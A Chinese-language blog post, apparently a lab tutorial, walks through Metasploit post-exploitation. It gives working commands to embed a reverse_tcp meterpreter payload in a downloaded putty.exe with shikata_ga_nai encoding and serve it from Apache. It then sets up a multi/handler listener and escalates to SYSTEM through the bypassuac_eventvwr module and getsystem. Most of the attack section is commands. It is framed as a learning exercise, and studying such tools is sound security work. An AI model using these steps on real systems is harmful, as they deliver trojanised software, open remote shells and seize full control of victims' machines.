MSF渗透测试之msfvenom提权

MSF渗透测试之msfvenom

MSF后渗透之msfvenom生成payload提权

文章目录

  • MSF渗透测试之msfvenom
    • MSF后渗透之msfvenom生成payload提权
  • 前言
  • 一、MSF的使用?
  • 二、提权第一步
    • 1.打开kali,进入msfvenom,生成payload
  • 总结

前言

MSF后渗透之msfvenom生成payload提权
1.MSF的使用

一、MSF的使用?

MSF是一个渗透测试的靶机,集成了多个漏洞库和多个payload,用于渗透测试提权专用的提权工具。

二、提权第一步

1.打开kali,进入msfvenom,生成payload

代码如下(示例):
1.首先先打开kali的服务器, service apache2 start,让外界可以访问到kali。
2.生成payload。
(1)先在kali下载好后门工具。执行命令。
wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
(2)利用msfvenom生成payload。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.222.131 lport=5445 -x putty.exe -e x86/shikata_ga_nai -f exe -o /var/www/html/hello.exe
MSF渗透测试之msfvenom提权_第1张图片
(3)打开msf,使用攻击模块。
use exploit/multi/handler
(4)设置payload。
set payload windows/meterpreter/reverse_tcp
(5)打开options进行查看。
MSF渗透测试之msfvenom提权_第2张图片
设置好目标主机ip地址和端口
set lhost 192.168.222.131
set lport 5445
(6)run后,成功进入meterpreter后渗透阶段
MSF渗透测试之msfvenom提权_第3张图片
(7)进行进一步的提权发现得不到系统的信息。只能继续下一步攻击,获得更高的权限。首先先回到session,执行background。
回到回话后,使用模块,设置session参数为1。
MSF渗透测试之msfvenom提权_第4张图片
(8)run后得到系统信息,因为是在本机,直接就可以看到主机的事件查看表。
MSF渗透测试之msfvenom提权_第5张图片
(9)在win7中,后渗透的取得系统权限的命令和模块执行background回到会话中
MSF渗透测试之msfvenom提权_第6张图片
使用提权模块
use exploit/windows/local/bypassuac_eventvwr
查看options,设置session为
set session 1
MSF渗透测试之msfvenom提权_第7张图片
执行run后,输入getsystem即可提升到系统权限了
实验成功

总结

本次实验是对MSF后渗透模块的一次渗透,利用msfvenom工具进行提权,集合了各个模块的使用,加深对MSF的进一步了解。

你可能感兴趣的:(MFS渗透测试,测试工具,运维开发)